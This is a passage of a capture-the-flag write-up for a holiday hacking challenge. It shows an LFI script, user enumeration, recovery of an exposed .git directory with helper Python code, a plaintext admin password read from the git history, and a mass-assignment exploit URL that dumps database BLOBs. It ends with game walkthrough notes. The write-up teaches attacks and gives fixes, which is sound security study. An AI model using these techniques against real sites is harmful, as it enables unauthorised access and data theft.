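    """Network: ReadCrashDump through the filter wrapper, then decode the base64."""
    body = crashdump_request("ReadCrashDump", {"crashdump": filter_wrapper(target)})
    req = urllib.request.Request(url, data=body, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return base64.b64decode(resp.read()).decode()


if __name__ == "__main__":
    for candidate in ("crashdump-AMnahP", "crashdump-AMnahP.php",
                      "../../etc/passwd", filter_wrapper("exception")):
        print(f"{candidate!r:60} original: {vulnerable_extension_check(candidate)!s:5} "
              f"hardened: {hardened_path(candidate)}")
```

Run stand-alone it prints which names each check accepts: the original lets the filter wrapper and traversal strings straight through to require(), while the allow-list only ever resolves a six-character dump name under /var/www/html/docs/. Call fetch_source() and pass the result to audio_comment() to reproduce the retrieval above.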

We are told there is another audio file on the analytics site that we need to collect after logging in.

After logging in with the guest account, as well as the mp3 there are some options to query data from one of two analytics sets, Launch and Usage. We also have the option to save these queries as reports.

The obvious thing to try here is SQL injection. I try some basic injection techniques but nothing seems to work; I even get heavy handed and throw sqlmap at it, with no luck.

What about trying to log on as another user? Fortunately it is really easy to enumerate users from the login page, because the error message differs depending on whether the username exists. If a user doesn't exist we are presented with:

 {“result”:401,”msg”:”No such user!”}

And if we find a valid user with an incorrect password we get:

{“result”:401,”msg”:”Bad password!”}

This lets us figure out there is an 'administrator' account, but we don't know the password for it. (The fix on the application side is a single generic "invalid username or password" message for both cases.) After trying some words that had been picked up through the other challenges nothing was working, and I was contemplating a brute force attack with hydra, especially as the response is easy to read. Before I did this I was reading back through the notes I had been making to see if I had missed something. Turns out I had.

The first thing I would do on each IP was run an nmap scan, and the scan of the analytics host had returned an interesting item I had completely overlooked.

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
|   2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
|_  256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open  ssl/http nginx 1.6.2
| http-git: 
|   104.198.252.157:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc) 
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.6.2
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php

nmap had found an exposed Git repository. Because the server also has directory listings enabled, we can use wget to recursively pull down every file under .git/:

wget -r --no-parent https://analytics.northpolewonderland.com/.git/

which gives us: Downloaded: 314 files, 1003K in 0.8s (1.25 MB/s)

With the .git folder pulled down I clean up the wget output by removing all the saved directory-listing index.html pages.

[email protected]:~# cd analytics.northpolewonderland.com/.git
[email protected]:~/analytics.northpolewonderland.com/.git# find . -name index.html -exec rm {} +
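wget -r only works because the server lists directories; without listings you have to walk the repository yourself. As an added example (mine, not from the post), the following Python walks an exposed .git the way git itself does: from HEAD to the branch ref, then from each loose commit object to its parent, verifying every object's SHA-1 as it goes. The "server" is an in-memory dict holding two constructed commits with made-up messages; http_fetcher() is the drop-in for a real host. Packfiles and packed-refs are not handled, and once the files are on disk plain git log does the job, as below.

```python
import hashlib
import urllib.request
import zlib


def git_object(kind: str, body: bytes):
    """Encode a loose object the way git does and return (sha1 hex, zlib bytes).
    The object id is the SHA-1 of "<type> <size>\\0<body>", not of the file."""
    record = f"{kind} {len(body)}\0".encode() + body
    return hashlib.sha1(record).hexdigest(), zlib.compress(record)


def object_path(oid: str) -> str:
    """Loose objects live at .git/objects/<first 2 hex>/<remaining 38 hex>."""
    return f".git/objects/{oid[:2]}/{oid[2:]}"


def parse_object(compressed: bytes, expected_oid: str = None):
    """Inflate a loose object, check its hash and size, and return (kind, body)."""
    record = zlib.decompress(compressed)
    if expected_oid and hashlib.sha1(record).hexdigest() != expected_oid:
        raise ValueError("object hash mismatch: tampered or mis-fetched")
    header, _, body = record.partition(b"\0")
    kind, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError("object size mismatch")
    return kind, body


def parse_commit(body: bytes) -> dict:
    """Split a commit body into its headers (tree, parent, author...) and message."""
    headers, _, message = body.decode().partition("\n\n")
    info = {"parents": []}
    for line in headers.splitlines():
        key, _, value = line.partition(" ")
        if key == "parent":
            info["parents"].append(value)
        else:
            info[key] = value
    info["message"] = message.strip()
    return info


def walk_history(fetch):
    """fetch(path) -> bytes for paths under .git/. Follow HEAD to the branch
    ref, then each commit to its first parent; return [(oid, message), ...]."""
    head = fetch(".git/HEAD").decode().strip()
    if head.startswith("ref: "):
        oid = fetch(".git/" + head[len("ref: "):]).decode().strip()
    else:
        oid = head  # detached HEAD holds the commit id directly
    history = []
    while oid:
        kind, body = parse_object(fetch(object_path(oid)), oid)
        if kind != "commit":
            raise ValueError(f"{oid} is a {kind}, not a commit")
        commit = parse_commit(body)
        history.append((oid, commit["message"]))
        oid = commit["parents"][0] if commit["parents"] else None
    return history


def http_fetcher(base_url: str):
    """Drop-in fetch() for a real host, e.g. http_fetcher("https://analytics.northpolewonderland.com")."""
    def fetch(path: str) -> bytes:
        with urllib.request.urlopen(base_url.rstrip("/") + "/" + path, timeout=10) as r:
            return r.read()
    return fetch


def build_sample_repo() -> dict:
    """Constructed stand-in for the web server: two commits on master over an empty tree."""
    store = {}
    tree_id, tree_blob = git_object("tree", b"")
    store[object_path(tree_id)] = tree_blob
    parent = None
    for msg in ("Add authentication", "Finishing touches (style, css, etc)"):
        lines = [f"tree {tree_id}"]
        if parent:
            lines.append(f"parent {parent}")
        lines += ["author me <me@example.invalid> 1480707735 +0000",
                  "committer me <me@example.invalid> 1480707735 +0000",
                  "", msg, ""]
        oid, blob = git_object("commit", "\n".join(lines).encode())
        store[object_path(oid)] = blob
        parent = oid
    store[".git/HEAD"] = b"ref: refs/heads/master\n"
    store[".git/refs/heads/master"] = (parent + "\n").encode()
    return store


if __name__ == "__main__":
    for oid, message in walk_history(build_sample_repo().__getitem__):
        print(oid[:12], message)
```

The hash check in parse_object() is the same integrity property git relies on: an object fetched from a hostile or broken mirror whose content does not hash to its own name is discarded rather than trusted.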

As this is a git repo, let's see if we can read the git log.

Yes we can, and that's a lot of information.

[email protected]:~/analytics.northpolewonderland.com/.git# git log
commit 16ae0cbe2630a87c0470b9a864bf048e813826db
Author: me <[email protected]>
Date:   Fri Dec 2 19:42:15 2016 +0000

    Finishing touches (style, css, etc)

commit 106079e728c97ebea387042a2e076fab62952e1e
Author: me <[email protected]>
Date:   Tue Nov 22 17:51:52 2016 -0800

    Got rid of mysqli_fetch_all(), which isn't widely supported

commit e46b41e391ee0e9f4afab7880982501ac1471fb4
Author: me <[email protected]>
Date:   Mon Nov 21 21:19:11 2016 -0800

    HTML escape more output values on the test page

commit 935d79726e13ab65c3b5baa4d925de86059057d4
Author: me <[email protected]>
Date:   Mon Nov 21 21:18:49 2016 -0800

    HTML escape an output value on the test page

commit 62547860f9a6e0f3a3bdfd3f9b14fea3ac7f7c31
Author: me <[email protected]>
Date:   Mon Nov 21 21:15:08 2016 -0800

    Fix database dump

commit 85a4207c178fa0f9c6b6bb77a6d42eac487159c0
Author: me <[email protected]>
Date:   Mon Nov 21 21:14:36 2016 -0800

    Saved queries now save the query object instead of the results

commit 45edadc1850c3894ab8850d1d77dca9a074a3a6a
Author: me <[email protected]>
Date:   Mon Nov 21 20:50:40 2016 -0800

    Update README.md to reflect the actual current state

commit 885ec6a4e870ce983aecde3a4f0e398b6a76615f
Author: me <[email protected]>
Date:   Mon Nov 21 20:49:23 2016 -0800

    Update report.php to log actual data to the database instead of static strings

commit 58c900fd53fced0d588e00e23c26cb8465eed498
Author: me <[email protected]>
Date:   Fri Nov 18 22:35:53 2016 -0800

    Add view.php

commit 43970092ea851cff05e44aba3e0a67eb351304f3
Author: me <[email protected]>
Date:   Fri Nov 18 22:20:08 2016 -0800

    Remove unnecessary data from the database dump

commit 1908b71d42bce15345cabb7a63f57b5c79b85d15
Author: me <[email protected]>
Date:   Fri Nov 18 22:19:21 2016 -0800

    Update the database dump

commit 0778ac7de1d7ff8ae46ebabdee33a340ab9506f3
Author: me <[email protected]>
Date:   Fri Nov 18 22:10:10 2016 -0800

    Reports can now be saved

commit 1562064538562f077d388044e344e3c2d85450d7
Author: me <[email protected]>
Date:   Fri Nov 18 21:39:30 2016 -0800

    Add a fairly complex query page for looking up records

commit 259d406f3f2345b50338d54a53efa36dd08f6f20
Author: me <[email protected]>
Date:   Fri Nov 18 19:51:47 2016 -0800

    Add a header, a footer, and a logout page

commit 2689a45ab9c38d92675660b9113fc173a0ccf129
Author: me <[email protected]>
Date:   Mon Nov 14 20:34:42 2016 -0800

    Fix the database dump

commit cf5f27b161f53d62f97ad6ebc648701288a2ea89
Author: me <[email protected]>
Date:   Mon Nov 14 20:33:27 2016 -0800

    Change the database and application/test script to use the real field names instead of fake names

commit 6ab9fe6ec3de2e28b79108ff5110643e9ba32478
Author: me <[email protected]>
Date:   Sun Nov 13 21:13:20 2016 -0800

    Add login to the HTML side of things

commit 02e8d14ffa8910bfd5365ff36eb96bcd7efc4409
Author: me <[email protected]>
Date:   Sun Nov 13 20:27:31 2016 -0800

    Add a HTML login page, and refactor a little to make check_user() usable by both JSON and HTML

commit f0d28ed3cc39538a6c415789408ef3f24ded959c
Author: me <[email protected]>
Date:   Sun Nov 13 20:06:13 2016 -0800

    Move some functions into this_is_json.php

commit d9636a3d648e617fcb92055dea63ac2469f67c84
Author: me <[email protected]>
Date:   Sun Nov 13 19:22:22 2016 -0800

    Small authentication fix

commit 5f0c135e1479d865945577c0a70d0cf39e49cdc7
Author: me <[email protected]>
Date:   Sun Nov 13 19:19:32 2016 -0800

    Add authentication

commit 420f433fe33d14abac5c3a588c3e753d0d71d50d
Author: me <[email protected]>
Date:   Sun Nov 13 18:37:10 2016 -0800

    Add some basic write-to-the-database functionality

commit bb2646691fc9f6bf5f1a0ade746b28f8147ffa48
Author: me <[email protected]>
Date:   Sun Nov 13 18:25:23 2016 -0800

    Add a bit of database functionality

commit 1057b70e7681f44aac2789e26a2b714327d8c203
Author: me <[email protected]>
Date:   Sun Nov 13 18:11:31 2016 -0800

    Add a script to test the API

commit d63a7e0df35ad525fa40eceae67be5b27215ece8
Author: me <[email protected]>
Date:   Sun Nov 13 18:10:45 2016 -0800

    Added the start of a reporting page

But we still don’t have any source code, which is what I really want so I can find the final audio file.

I can’t simply check out a branch; git complains that there is no work tree. Looking at the contents of the folder we have, there is an objects directory containing a lot of files of seemingly random data. These are git objects: every time a file is added or a change is committed, git writes a zlib-compressed blob object holding the file’s contents, and each commit adds a tree object (the directory listing) and a commit object (author, date, message and parent). Because every object is addressed by the SHA-1 of its own contents, the objects directory alone is enough to rebuild the repository; we don’t need the refs or the work tree.

We initialise an empty git repository, copy in the recovered objects directory, run git’s integrity check (git fsck doesn’t repair anything, but it lists objects that nothing points to, so with no refs present it reports the tip commit as ‘dangling’), then check out that commit by its hash.

[email protected]:~$ mkdir tempgit
[email protected]:~$ cd tempgit
[email protected]:~/tempgit$ git init
Initialised empty Git repository in /home/thehermit/tempgit/.git/
[email protected]:~/tempgit$ cd .git
[email protected]:~/tempgit/.git$ cp -R ../../analytics.northpolewonderland.com/.git/objects .
[email protected]:~/tempgit/.git$ cd ..
[email protected]:~/tempgit$ git fsck --full
notice: HEAD points to an unborn branch (master)
Checking object directories: 100% (256/256), done.
notice: No default references
dangling commit 16ae0cbe2630a87c0470b9a864bf048e813826db
dangling blob 7b9389b70b24166f782b755d960c7b017f78719d
[email protected]:~/tempgit$ git checkout 16ae0cbe2630a87c0470b9a864bf048e813826db
Note: checking out '16ae0cbe2630a87c0470b9a864bf048e813826db'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b new_branch_name

HEAD is now at 16ae0cb... Finishing touches (style, css, etc)
[email protected]:~/tempgit$ ls
crypto.php  edit.php    getaudio.php  js          mp3.php    report.php    this_is_html.php  view.php
css         fonts       header.php    login.php   query.php  sprusage.sql  this_is_json.php
db.php      footer.php  index.php     logout.php  README.md  test          uuid.php
[email protected]:~/tempgit$
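The transcript above is the practical route. As an added example (not from the original post, and not git’s own code), here is what git is doing underneath: a small Python reader for loose objects that inflates each file, checks its header and SHA-1, finds the commits nothing points to (what git fsck calls dangling) and walks the history from the tip. It is useful when git is unavailable or fsck refuses a damaged directory. The two-commit history it reads is constructed in a temp directory for the demo and is not the challenge repository; the author line is assumed.

```python
import hashlib
import os
import tempfile
import zlib


def hash_object(obj_type: str, data: bytes) -> tuple:
    """Loose-object store form is "<type> <size>\\0<content>"; the object's
    name is the SHA-1 of that, and the file on disk is it zlib-compressed."""
    store = b"%s %d\0%s" % (obj_type.encode(), len(data), data)
    return hashlib.sha1(store).hexdigest(), zlib.compress(store)


def write_object(objects_dir: str, obj_type: str, data: bytes) -> str:
    """Write a loose object to objects/xx/yyyy... and return its SHA-1."""
    sha, packed = hash_object(obj_type, data)
    subdir = os.path.join(objects_dir, sha[:2])
    os.makedirs(subdir, exist_ok=True)
    with open(os.path.join(subdir, sha[2:]), "wb") as fh:
        fh.write(packed)
    return sha


def read_object(objects_dir: str, sha: str) -> tuple:
    """Inflate a loose object, verify hash and size, return (type, content)."""
    with open(os.path.join(objects_dir, sha[:2], sha[2:]), "rb") as fh:
        store = zlib.decompress(fh.read())
    if hashlib.sha1(store).hexdigest() != sha:
        raise ValueError(f"object {sha} is corrupt: hash mismatch")
    header, _, content = store.partition(b"\0")
    obj_type, size = header.decode().split(" ")
    if int(size) != len(content):
        raise ValueError(f"object {sha} is corrupt: size mismatch")
    return obj_type, content


def parse_commit(content: bytes) -> dict:
    """Split a commit object into its header fields and its message."""
    header, _, message = content.decode("utf-8", "replace").partition("\n\n")
    fields = {"parent": [], "message": message.rstrip("\n")}
    for line in header.splitlines():
        key, _, value = line.partition(" ")
        if key == "parent":
            fields["parent"].append(value)
        else:
            fields[key] = value
    return fields


def all_commits(objects_dir: str) -> dict:
    """Map SHA -> parsed commit for every loose commit object present."""
    commits = {}
    for fanout in os.listdir(objects_dir):
        if len(fanout) != 2:
            continue  # skip objects/info and objects/pack
        for rest in os.listdir(os.path.join(objects_dir, fanout)):
            sha = fanout + rest
            obj_type, content = read_object(objects_dir, sha)
            if obj_type == "commit":
                commits[sha] = parse_commit(content)
    return commits


def dangling_commits(objects_dir: str) -> list:
    """Commits no other commit names as a parent: with no refs, these are
    the branch tips that git fsck reports as dangling."""
    commits = all_commits(objects_dir)
    parents = {p for c in commits.values() for p in c["parent"]}
    return sorted(sha for sha in commits if sha not in parents)


def history(objects_dir: str, tip: str) -> list:
    """Walk first-parent history from tip, newest first, like git log."""
    commits, out = all_commits(objects_dir), []
    while tip:
        out.append((tip, commits[tip]["message"]))
        tip = commits[tip]["parent"][0] if commits[tip]["parent"] else None
    return out


def demo() -> dict:
    """Constructed two-commit repo in a temp objects dir (not the challenge repo)."""
    objects_dir = os.path.join(tempfile.mkdtemp(), "objects")
    who = "me <me@example.com> 1479874312 -0800"  # assumed author/committer line
    blob1 = write_object(objects_dir, "blob", b"hello\n")
    tree1 = write_object(objects_dir, "tree", b"100644 README.md\0" + bytes.fromhex(blob1))
    c1 = write_object(objects_dir, "commit",
                      f"tree {tree1}\nauthor {who}\ncommitter {who}\n\nAdd README\n".encode())
    blob2 = write_object(objects_dir, "blob", b"hello again\n")
    tree2 = write_object(objects_dir, "tree", b"100644 README.md\0" + bytes.fromhex(blob2))
    c2 = write_object(objects_dir, "commit",
                      f"tree {tree2}\nparent {c1}\nauthor {who}\ncommitter {who}\n\nUpdate README\n".encode())
    return {"blob1": blob1, "tip": c2, "tips": dangling_commits(objects_dir),
            "log": [m for _, m in history(objects_dir, c2)],
            "old_readme": read_object(objects_dir, blob1)[1]}


if __name__ == "__main__":
    print(demo())
```

Note that the old README blob is still readable after the second commit replaced it; that is exactly why the credentials removed from the SQL dump later in this write-up are still recoverable. This reader only handles loose objects; anything git has packed into objects/pack/*.pack needs a pack parser or `git unpack-objects < file.pack` first.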

Now we can see the source for all the files, including an SQL file. Checking the file we can see the schema for all the tables, including an audio table.

DROP TABLE IF EXISTS `audio`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `audio` (
  `id` varchar(36) NOT NULL,
  `username` varchar(32) NOT NULL,
  `filename` varchar(32) NOT NULL,
  `mp3` MEDIUMBLOB NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

Sadly the sprusage.sql file only contains the database schema; it doesn’t contain any of the table data. Or at least it doesn’t now. One of the commits we saw in the git history was ‘Remove unnecessary data from the database dump’, so we can check out the commit just before that one and see what the file contained then. This is the usual lesson with leaked repositories: deleting a secret in a later commit doesn’t remove it, it is still in the history.

git checkout 1908b71d42bce15345cabb7a63f57b5c79b85d15

The audio table did not exist at this point in the repo, but the dump does contain the users table, including the administrator account:

--
-- Dumping data for table `users`
--

LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;

Which still works :)

After logging in with the administrator account we notice the MP3 link we had before has been replaced with an Edit link. Fortunately we have the source for all these pages, so we don’t need to stumble around. (Make sure to check out the latest commit of the recovered repository again first.)

Checking the ‘getaudio’ and ‘mp3’ PHP files, they look well locked down to only handing out the guest MP3. All the PHP files seem to be protected against direct SQL injection, which matches my earlier experience with this site. So let’s have a look at the new edit.php.

On the surface it looks simple: it lets us update the Name and Description of any stored report. We can confirm this by running a query, saving it as a report, then using the edit page with the report ID we just generated.

But how does this help us?

Looking more closely at the PHP and at the page’s output, the new SQL values are not set by name. The page loops over the columns of the reports table and copies in any matching GET parameter after checking it is a valid column name. Name and description are valid and get updated, but it also checks for a column called query, which is not included in the HTML form. Each value is quoted before it goes into the UPDATE, so this is not classic SQL injection; it is a mass-assignment bug, where the server accepts a field the form never exposes. Let’s craft a request that supplies something in that query field.

Worth a shot. https://analytics.northpolewonderland.com/edit.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3&name=a&description=b&query=SELECT * FROM audio

The output suggests the update was successful:

Checking for id...
Yup!
Checking for name...
Yup!
Checking for description...
Yup!
Checking for query...
Yup!
UPDATE `reports` SET `id`='f73d5f04-ebca-439c-822a-4ad1214803e3', `name`='a', `description`='b', `query`='SELECT * FROM audio' WHERE `id`='f73d5f04-ebca-439c-822a-4ad1214803e3'Update complete!

But how do we view the results of our query? Let’s look at the report using the View link: https://analytics.northpolewonderland.com/view.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3

And there is the output of our query. The chain is: edit.php lets us overwrite the stored query column because it trusts any column name it recognises, and view.php runs whatever SQL is stored in that column. Together that is arbitrary query execution as the administrator without a single unescaped quote anywhere.
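To make the pattern concrete, here is an added example (mine, not the challenge’s edit.php or view.php source) that models both halves of the chain against an in-memory SQLite stand-in for the sprusage schema. The vulnerable handler builds its UPDATE from every table column it finds in the request, the fixed one allow-lists only the columns the form exposes, and the view handler runs the stored query verbatim. The schema rows are constructed, the report ID is the one from this write-up, and SQLite’s hex() stands in for MySQL’s TO_BASE64() since SQLite has no base64 function.

```python
import sqlite3

REPORT_COLUMNS = ("id", "name", "description", "query")  # every column of `reports`
FORM_COLUMNS = ("name", "description")                   # what the edit form actually exposes
REPORT_ID = "f73d5f04-ebca-439c-822a-4ad1214803e3"       # the saved report from the write-up


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the sprusage schema (not the real dump)."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE reports (id TEXT PRIMARY KEY, name TEXT, description TEXT, query TEXT);
        CREATE TABLE audio   (id TEXT PRIMARY KEY, username TEXT, filename TEXT, mp3 BLOB);
        INSERT INTO reports VALUES ('{REPORT_ID}', 'my report', 'saved from query.php', 'SELECT 1');
        INSERT INTO audio VALUES ('a1', 'guest', 'discombobulatedaudio2.mp3', X'494433');
        INSERT INTO audio VALUES ('a2', 'administrator', 'discombobulatedaudio7.mp3', X'4944330300');
    """)
    return db


def edit_report_vulnerable(db: sqlite3.Connection, params: dict) -> str:
    """Mirrors the edit.php pattern: SET is built from whichever table columns
    appear in the request. Values are bound, so there is no classic injection;
    the bug is that `query` is accepted although the form never sends it."""
    assignments, values = [], []
    for col in REPORT_COLUMNS:
        if col in params:
            assignments.append(f'"{col}" = ?')
            values.append(params[col])
    sql = f'UPDATE reports SET {", ".join(assignments)} WHERE id = ?'
    db.execute(sql, values + [params["id"]])
    return sql


def edit_report_fixed(db: sqlite3.Connection, params: dict) -> str:
    """Allow-list only the columns the form is meant to change."""
    assignments, values = [], []
    for col in FORM_COLUMNS:
        if col in params:
            assignments.append(f'"{col}" = ?')
            values.append(params[col])
    if not assignments:
        raise ValueError("nothing to update")
    sql = f'UPDATE reports SET {", ".join(assignments)} WHERE id = ?'
    db.execute(sql, values + [params["id"]])
    return sql


def view_report(db: sqlite3.Connection, report_id: str) -> list:
    """Mirrors view.php: runs the stored query text verbatim."""
    (query,) = db.execute("SELECT query FROM reports WHERE id = ?", (report_id,)).fetchone()
    return db.execute(query).fetchall()


def stored_query(db: sqlite3.Connection, report_id: str) -> str:
    return db.execute("SELECT query FROM reports WHERE id = ?", (report_id,)).fetchone()[0]


# The same GET parameters as the write-up's request, with a printable-BLOB query.
ATTACK = {"id": REPORT_ID, "name": "a", "description": "b",
          "query": "SELECT username, filename, hex(mp3) FROM audio ORDER BY username"}


def exfiltrate_via_vulnerable() -> list:
    """Overwrite the stored query, then let the viewer run it and decode the BLOBs."""
    db = setup_db()
    edit_report_vulnerable(db, ATTACK)
    return [(user, name, bytes.fromhex(blob_hex))
            for user, name, blob_hex in view_report(db, REPORT_ID)]


def attack_against_fixed() -> str:
    """Same request against the allow-listed handler: the query column is untouched."""
    db = setup_db()
    edit_report_fixed(db, ATTACK)
    return stored_query(db, REPORT_ID)


if __name__ == "__main__":
    print(exfiltrate_via_vulnerable())
    print(attack_against_fixed())
```

The allow-list closes the mass-assignment hole, but view.php executing SQL text out of a table is still the deeper design flaw: anyone who can write that column by any other path gets the same result. A proper fix stores a structured query definition (table, filters, sort) and builds the SQL server-side, and runs report queries under a database account that cannot read tables like audio.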

We can tell from the SQL file that the MP3 is stored as a BLOB in the database itself, not as a file on disk, and we know we can’t get our MP3 through getaudio as that is locked to the guest track. My first thought was SELECT ... INTO OUTFILE, but that doesn’t seem to be enabled or working (it needs the FILE privilege, writes to the database server’s own filesystem, and secure_file_priv usually restricts where, so it often fails even when the query itself runs).

After reading up on exporting data from MySQL I found a function that might help: TO_BASE64() (available since MySQL 5.6.1), which does exactly what it says on the tin and returns the column as base64 text, so the binary data survives the trip through an HTML page.

With this in hand we create a new query.

SELECT username,filename,TO_BASE64(mp3) from audio
https://analytics.northpolewonderland.com/edit.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3&name=a&description=b&query=SELECT%20username,filename,TO_BASE64(mp3)%20from%20audio

Success, looking at our report with the new query we have the mp3 data as base64.

Which we can copy out to a file and decode back into an MP3:

[email protected]:~$ cat mp3b64.txt | base64 --decode > discombobulatedaudio7.mp3
[email protected]:~$ file discombobulatedaudio7.mp3
discombobulatedaudio7.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo

And that gives us the final audio file. discombobulatedaudio7.mp3

We have all 7 audio clips:

  1. discombobulatedaudio1.mp3
  2. discombobulatedaudio2.mp3
  3. discombobulatedaudio3.mp3
  4. debug-20161224235959-0.mp3
  5. discombobulatedaudio5.mp3
  6. discombobulated-audio-6-XyzE3N9YqKNH.mp3
  7. discombobulatedaudio7.mp3

Time to put them all back together again. Listening to each track, it sounds as though it is being played at a really low speed, so let’s see what happens if we speed them back up. Using Audacity we can increase the tempo of each track. It’s important to use Change Tempo rather than Change Speed, as a tempo change keeps the pitch and avoids ‘chipmunking’ the audio.

Increasing the tempo in two passes (400%, then a further 100% on the result) gives an audio sample that’s clear enough to understand:


Father Christmas. Santa Claus. Or, as I’ve always known him, Jeff.

A quote from the Doctor Who Christmas special. We have one room which is still password protected: this quote opens the door in the corridor behind Santa’s Office and leads up to the Clock Tower, where we find our villain, Dr. Who.

He has a lot to say about why he did what he did.

And with all that said the credits begin to roll. With Santa rescued and back at work, the villain revealed and the timeline apparently safe, our work here is done. Just a check of all our quests to make sure we have completed them all.

Once you arrive at the Dosis home you find you are faced with 4 Quests and 21 Achievements. Each quest and achievement gets you one step closer to figuring out who kidnapped Santa.

Achievements:

There are 5 components that need to be collected. This slideshow shows all the locations. Use the main maps for reference


There are 20 coins spread around the North Pole both in the present and in the Past. This slideshow will point you at all the locations, Use the main Map for reference.


The final Achievement. Once you have all the Audio files. Or enough to complete the quote head to the Corridor behind Santa’s Office and use the full quote as the password to gain access to the Clock Tower. Up the stairs you find Dr Who who will explain his reasons to you.
Maps

The following Maps detail the layout of the North Pole and the Buildings. Click each image then zoom in for the full view.

Someone has abducted Santa Claus! We found his business card. And we’re the only ones who know that Santa’s been abducted. We’ve got to do something… let’s look at this card to see if it can be any help in finding out what happened to Santa!

Who would do such a thing? And on Christmas Eve no less. They’ll destroy Christmas! But why? We found Santa’s business card. It must have fallen out of his pocket while someone was kidnapping him.

Hi, I’m Holly Evergreen. Welcome to the North Pole Wonderland! I’m glad you’re here. We need help finding Santa! He was delivering toys to good girls and boys, but he disappeared mysteriously. We saw his sleigh overhead, and some elves have found and collected pieces that fell to the ground.

Have you met the Oracle? He is the wisest of the wise, and we all manage the scope of the projects through him. You should check with him before attacking any systems.

Santagram? All of Santa’s bug bounty elves are on it. I hope I get promoted to that team someday. With all the pieces of the Cranberry Pi and the Cranbian password, you’ll be able to access the terminals through the North Pole Wonderland. Just walk up to and access any terminal with this logo. Maybe the terminals will offer some clues for finding Santa. If you lose it, you can always download the Cranbian image again.

Hi, I’m Sparkle Redberry. I’m a little distraught at the moment. A lot of the North Pole Wonderland elves work in the bug bounty team. That’s how Santa finances this whole North Pole Operation. I’m working to build my skills to contribute more to the team. Each time I master a pen testing skill area, I get a NetWars challenge coin. I’ve got a hole in my pocket, and I’ve lost my NetWars coins. Do you think you could help me find them? It would mean the world to me!

Hi, I’m Wunorse Openslae. I work on engineering projects for Santa. A lot of people don’t know this but his sleigh can travel through space and time. I’m quite proud. The SCADA interface for sleigh functions is controlled with a Cranberry Pi and Cranbian Linux. It’s really powerful to be able to switch out firmware builds by swapping SD cards.

Dealing with piles of SD cards though, that’s a different story. Fortunately, this article gave me some ideas on better data management. SantaGram? Yeah it’s popular up here. #elflife

Hi, I’m Sugarplum Mary. I’m a developer! I like PHP, it offers so much flexibility even though the syntax is straight out of 1978. PHP Filters can be used to read all kinds of I/O streams. As a developer, I must be careful to ensure attackers can’t access sensitive files or data.

Jeff McJunkin wrote a blog post on local file inclusions using this technique. I need to go back and make sure no one can read my source code using this technique. I love curly braces and semicolons.

I am the great and powerful oracle, also known as Tom Hessman. If you enter some text, I will treat it as a question. Ask me about an IP address, I will tell you if it is in scope. You can only target those I approve, despite my entertaining trope.

I am a most marvelous machine.
I gather nice tunes from a holiday scene.
I then cut them and mix them and stir them about.
And across the North Pole, I send them all out!
And then you can smile and dance all the day.
To the jams I create, a music parfait!

Howdy, my name is Minty Candycane. I’m on the red team, Rudolph’s Red Team! I’ve been spending a lot of time with NMAP. It’s such a great port scanner! I’m very thorough so I check all the TCP ports to look for extra services. NMAP is also great for finding extra files on web servers. The default scripts run with the “-sC” option work really well for me. “First, YULE LOGon”! I crack people up.

Speaking of cracking, John The Ripper is fantastic for cracking hashes. It is good at determining the correct hashing algorithm. I have a lot of luck with the RockYou password list. Speaking of rocks, where do geologists like to relax? In a rocking chair. HA!

Hi, I’m Bushy Evergreen. Shinny and I lead the Android analysis team. Shinny spends most of her time on app reverse engineering. I prefer to analyze apps at the Android Bytecode layer. My favorite technique? Decompiling Android Apps with Apktool. JadX is great for inspecting a Java representation of the app, but can’t be changed and then recompiled. With Apktool, I can preserve the functionality of the app, then change the android bytecode smali files. I can even change the values in Android XML files, then use Apktool again to recompile the app.

Apktool compiled apps can’t be installed and run until they are signed. The Java keytool and jarsigner utilities are all you need for that. This video on manipulating and re-signing Android apps is pretty useful.

Hi, my name is Pepper Minstix. I’m one of Santa’s bug bounty elves. Lately, I’ve been spending time attacking JavaScript frameworks, specifically the Meteor Framework. Meteor uses a publish/subscribe messaging platform. This makes it easy for a web page to get dynamic data from a server. Meteor’s message passing mechanism uses the Distributed Data Protocol (DDP). DDP is basically a JSON-based protocol using webSockets and SockJS for RPC and data management. The good news is that Meteor mitigates most XSS attacks, CSRF attacks and SQL injection attacks. The bad news is that people get a little too caught up in messaging subscriptions, and get too much data from the server. You should also check out Tim Medin’s talk from HackFest 2016 and the related blog post. Also Meteor Miner is a browser add-on for Tampermonkey to easily browse through Meteor Subscriptions. Check it out!

When I need a break from bug bounty work, I play Dungeon. I’ve been playing it since 1978. I still have yet to beat the Cyclops… Alabaster’s brother is the only elf I’ve ever seen beat it, and he really immersed himself in the game. I have an old version here.

